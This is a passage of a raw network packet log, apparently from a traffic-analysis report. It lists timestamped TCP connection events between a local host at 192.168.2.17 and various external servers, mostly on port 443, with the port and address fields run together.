                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.101933002 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.102185965 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.102263927 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.102287054 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.102336884 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.102366924 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.119329929 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.141350031 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.141360044 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.155528069 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.192749977 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.198554039 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.198616982 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.198673010 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.199196100 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.199208021 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.208548069 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.211215019 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.211461067 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.211469889 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.211762905 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.212076902 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.212136984 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.212199926 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226145029 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226164103 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226214886 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226227999 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226284027 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226741076 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.226769924 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.249550104 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.249571085 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.249748945 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.249804020 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.249849081 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259327888 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259567022 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259592056 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259653091 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259808064 CET49934443192.168.2.1735.160.151.220
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259821892 CET4434993435.160.151.220192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.262660027 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.262847900 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.262864113 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.263262987 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.263627052 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.263684988 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.263802052 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.265542984 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.285248995 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.287341118 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.287360907 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.287368059 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.287543058 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.287564993 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.288538933 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.288626909 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.289443016 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.289509058 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.289581060 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.289588928 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291389942 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291551113 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291692019 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291770935 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291843891 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.291872025 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.302340031 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.302622080 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.302634001 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.303611994 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.303690910 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.303973913 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.304034948 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.304060936 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.307336092 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.308389902 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.308569908 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.308593988 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.311803102 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.311860085 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.312068939 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.312143087 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.312144995 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.313509941 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314368963 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314393044 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314408064 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314461946 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314471960 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.314524889 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.329539061 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.345521927 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.345541954 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.345721006 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.345726967 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.345726967 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.352526903 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.352541924 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.352597952 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.352605104 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.352649927 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354593039 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354664087 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354736090 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354923964 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354923964 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.354935884 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.355334044 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.355334044 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.361535072 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.361541986 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364201069 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364279032 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364331007 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364461899 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364475012 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364506006 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.364512920 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.393527985 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.395335913 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.408531904 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429796934 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429816961 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429869890 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429879904 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429908037 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.429923058 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467699051 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467714071 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467747927 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467772961 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467787027 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467798948 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467803001 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467839956 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467957020 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.467968941 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.471209049 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.471267939 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.471345901 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472115040 CET49937443192.168.2.17142.250.186.164
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472145081 CET44349937142.250.186.164192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472285986 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472311974 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472628117 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472628117 CET49938443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.472654104 CET4434993813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528384924 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528455019 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528592110 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528702021 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528716087 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528752089 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528780937 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.528870106 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.529124022 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.529140949 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.530761003 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.530833960 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.531121969 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.531196117 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.531295061 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.531301975 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.532772064 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.533344984 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.533354044 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534192085 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534256935 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534307957 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534466028 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534691095 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534715891 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534723997 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.534754038 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.535262108 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.535465002 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.535532951 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.537790060 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538013935 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538022995 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.539014101 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.539091110 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.540011883 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.540075064 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.540419102 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.540426016 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.546339035 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.546370983 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.546437025 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.546627998 CET49939443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.546641111 CET44349939157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564229012 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564250946 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564260006 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564280033 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564289093 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564343929 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564362049 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564389944 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.564398050 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.566375017 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.566459894 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.566515923 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.567801952 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.568375111 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.568397999 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.569837093 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.569907904 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570276022 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570357084 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570517063 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570525885 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570720911 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.570725918 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.579329967 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.583545923 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.583590031 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.585355043 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.612577915 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.612653017 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.612653971 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.612663031 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.612704992 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615386009 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615494967 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615499020 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615520000 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615556002 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.615593910 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.647552967 CET4968280192.168.2.17192.229.211.108
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.706415892 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.734983921 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735009909 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735033035 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735050917 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735064983 CET44349920157.240.0.6192.168.2.17
